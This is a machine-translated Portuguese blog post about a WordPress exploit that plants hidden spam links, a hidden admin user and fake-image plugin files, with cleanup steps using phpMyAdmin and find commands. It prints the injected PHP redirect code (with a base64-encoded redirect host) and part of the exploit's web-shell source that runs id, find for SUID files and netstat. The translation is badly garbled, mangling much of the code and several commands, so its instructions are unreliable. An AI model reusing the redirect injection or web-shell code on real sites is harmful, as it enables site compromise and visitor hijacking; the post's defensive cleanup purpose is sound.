Vírus blogosfera ... mas o que você fez para mim?

No último mês, tenho recebido avisos vírus no blog a partir de alguns visitantes. Inicialmente eu ignorou as advertências, porque eu instalei um antivírus bom (Kaspersky AV 2009) E mesmo blog por um longo tempo, eu nunca recebi um alerta de vírus (muito tempo atrás .. eu vi algo suspeito que a primeira atualização desapareceu. Finalmente ...).
Lentamente, começou a mostrar grandes variações tráfego de visitantesDepois que recentemente diminuiu de forma constante tráfego e começou a ser mais e mais pessoas me dizem que stealthsettings.com é virused. Ontem recebi de alguém um screenshot feito quando bloqueou um antivírus escrita em stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Foi muito convincente para mim, então eu coloquei todas as fontes pesquisadas. A primeira idéia que me veio à mente era fazer atualização as últimas WordPress (2.5.1), mas não antes do script de idade para apagar todos os arquivos do WordPress e fazer banco de dados de backup. Este procedimento não produziu nenhum resultado e provavelmente levaria muito tempo para dizer onde a buba estava, se ela não tivesse dito em uma discussão sobre o café, ele encontrou Google e seria bom vê-lo.
MyDigitalLife.info, publicou um artigo intitulado "WordPress Hack: Recuperar e corrigir Google e Search Engine ou nenhum tráfego Biscoito redirecionado para sua-Needs.info, AnyResults.Net, Golden-Info.net e outros sites ilegais"Essa é a ponta do fio que eu precisava.
É sobre um explorar WordPress baseado biscoitoQue eu acho que é muito complexo e fez o livro. Inteligente o suficiente para fazer uma Injeção de SQL Blog do banco de dados, para criar um usuário invisível uma verificação de rotina simples Dashboard->usuários, verificar os diretórios do servidor e arquivos "writable" (Com chmod 777), de procurar e de executar arquivos com os privilégios do grupo ou da raiz. Eu não sei quem explorar o nome e ver que há poucos artigos escritos sobre ele, apesar do fato de que muitos blogs estão infectados, incluindo a Roménia. Ok ... vou tentar tentar explicar generalidades sobre o vírus.

O que é vírus?

Primeiro, insira as páginas fontes em blogs, links invisíveis para os visitantes, mas visível e indexável para motores de busca, especialmente o Google. Deste modo transferência de locais de Page Rank indicados pelo atacante. Em segundo lugar, um é inserido código de redirecionamento URL para os visitantes provenientes do Google, Live, Yahoo, ... ou um leitor de RSS, e não o local em biscoito. um antivirus detecta o redirecionamento como Trojan-Clicker.HTML.

Os sintomas:

Diminuiu o tráfego de visitantes em massaEspecialmente em blogs, onde a maioria dos visitantes vêm do Google.

Identificação: (Daí complicar o problema para aqueles que não sabem como phpmyadmin, php e linux)

LA. ATENÇÃO! Primeiro faça uma base de dados de backup!

1. Verifique os arquivos de origem index.php, header.php, footer.php, O tema do blog e ver se há um código que usa criptografia base64 ou contém "if ($ ==" Ser 1 && sizeof ($ _COOKIE) == 0?) forma ":

Seref $ = array ("google", "msn", "viver", "altavista"
"Peça", "Yahoo", "AOL", "CNN", "clima", "alexa");
Ser = $ 0; foreach ($ Seref quanto $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref) == false) {$ Ser = "1;? Break;}!
if ($ Ser == "1 && sizeof ($ _COOKIE) == 0?) {header (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); saída;
}?>

... Ou algo assim. Excluir este código!

Clique sobre a imagem ...

índice de código

Na imagem acima eu acidentalmente selecionado a "<Php get_header ();?>". Esse código deve permanecer.

2. Usar phpMyAdmin e ir para o banco de dados tabela wp_usersOnde verificar se não há nenhum nome de usuário criada no 00:00:00 0000-00-00 (Possível no campo user_login escrever "WordPress". Observe a identificação de usuário (ID de campo) e, em seguida, excluí-lo.

Clique sobre a imagem ...

falso usuário

* A linha verde deve ser removido e manteve o seu ID. No caso de Foi ID = 8 .

3. Vá para a Tabela wp_usermetaOnde você localizado e limpar linhas de ID (onde o campo user_id Valor de ID é removido).

4. Na Tabela wp_option, Ir para active_plugins e ver o que plugin está habilitado suspeito. Ele pode ser usado como terminações _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinações de extensões de imagem falsas com _old e _new.

ONDE SELECT * FROM option_name = 'wp_options active_plugins'

Excluir este plugin, então vá para o blog - painel de instrumentos> -> Plugins, e ativar um plugin que desativar certo.

Clique na imagem para vê-la aparecer active_plugins arquivo de vírus.

plug-in

Siga o caminho no servidor FTP ou SSH, indicado no active_plugins e apagar o arquivo do servidor.

5. Também em phpMyAdmin, na Tabela wp_option, Localizar e apagar a linha que contém "rss_f541b3abd05e7962fcab37737f40fad8'E'internal_links_cache ".
Em internal_links_cache, ofereceu links de spam criptografados que aparecem em um blog Google Adsense código, O hacker.

6. Recomenda-se a alterar sua senha Blog e login remover todos userele suspeito. Upgrade para a versão mais recente do WordPress e definir o blog para não permitir o registro de novos usuários. Não há perda ... podem comentar e ilógico.

Eu tentei explicar o quanto, o que fazer em tal situação para limpar o blog deste vírus. O problema é muito pior do que parece e nem sequer resolvido porque é usado vulnerabilidades de segurança hospeda o servidor web, que é blog.

Como primeira medida de segurança, com acesso SSH, Fazer algumas verificações no servidor para ver se existem arquivos como * _old * e * _new. Com terminações.giff. jpeg. pngg. jpgg. Esses arquivos devem ser excluídos. Se você renomear um arquivo, por exemplo. top_right_old.giff in top_right_old.phpVemos que o arquivo é exatamente o servidor código de exploração.

Algumas dicas úteis para verificar, limpar e proteger o servidor. (via SSH)

1. cd / tmp e verificar se há pastas como tmpVFlma ou nome asemenatoare outras combinações e excluí-lo. Veja a imagem abaixo, duas pastas tais para mim:

tmpserver

rm-rf foldername

2. Verifique elimiati (mudando chmod-mail) pastas com atributos como possível chmod 777

encontrar tudo gravável files no diretório atual: Encontrar. -Type f-perm-2-ls
encontrar todos os diretórios graváveis ​​em dir atual: Encontrar. Tipo-d-perm-2-ls
encontre todos os diretórios graváveis ​​e files no diretório atual: Encontrar. -Perm-2-ls

3. À procura de arquivos suspeitos no servidor.

Encontrar. -Name "* _new.php *"
Encontrar. -Name "* _old.php *"
Encontrar. -Name "*. Jpgg"
Encontrar. -Name "* _giff"
Encontrar. -Name "* _pngg"

4, ATENÇÃO! os arquivos que foram estabelecidas pouco SUID si SGID. Esses arquivos são executados com os privilégios do usuário (grupo A) ou não raiz, o usuário que executar o arquivo. Esses arquivos podem levar ao comprometimento da raiz, se as questões de segurança. Se você não usar os arquivos SUID e SGID com pouco, execute 'chmod 0 " eles ou desinstalar pacote contendo eles.

Explorar contém em algum lugar a fonte ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ Os = Executar ("sysctl-n kern.ostype ').;
$ Os = Executar ("sysctl-n kern.osrelease ').;
$ Os = Executar ("sysctl-n kernel.ostype ').;
$ Os = Executar ("sysctl-n kernel.osrelease ').;
if (empty ($ user)) $ user = execute ('id');
Alias ​​$ matriz = (
"=>"
'encontrar suid files '=>' encontrar / -tipo f -perm -04000 -ls ',
'encontrar sgid files '=>' encontrar / -tipo f -perm -02000 -ls ',
'encontrar tudo gravável files no diretório atual '=>' find. -tipo f -perma -2 -ls ',
'Encontrar todos os diretórios graváveis ​​em corrente dir' => 'encontrar. Tipo-d-perm-2-ls ',
'encontre todos os diretórios graváveis ​​e files no diretório atual '=>' find. -perma -2 -ls ',
'Show abriu as portas' => 'netstat-an | grep-i ouvir ",
);
Else {}
. $ Os_name = Executar ('ver');
$ User = Executar ('echo% username% ").;
Alias ​​$ matriz = (
"=>"
"Mostrar runing serviços '=>' start 'net
"Lista de processos Show '=>' tasklist '
);
}

Entende que maneira ... basicamente violações de segurança. Portas abertas privilégios diretório "gravável" do grupo e execução de arquivos / root.

De volta com mais ...

Alguns blogs infectados: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... A lista continua ... muito.

Você pode verificar se um blog é vírus, usando motor de busca Google. copy & paste:

Site: comprar www.blegoo.com

Boa noite e aumento de trabalhar ;) Em breve eu venha a Eugene notícias sobre prevezibil.imprevizibil.com.

brb :)

TO: ATENÇÃO! WordPress tema mudança ou atualização para WordPress 2.5.1, não uma solução para se livrar do vírus.

Vírus blogosfera ... mas o que você fez para mim?

Sobre o autor

discrição

Apaixonado por tudo o que significa gadget e TI, tenho o prazer de escrever no stealthsettings.com da 2006 e adoro descobrir coisas novas sobre computadores e macOS, sistemas operacionais Linux, Windows, iOS e Android.

Deixe um comentário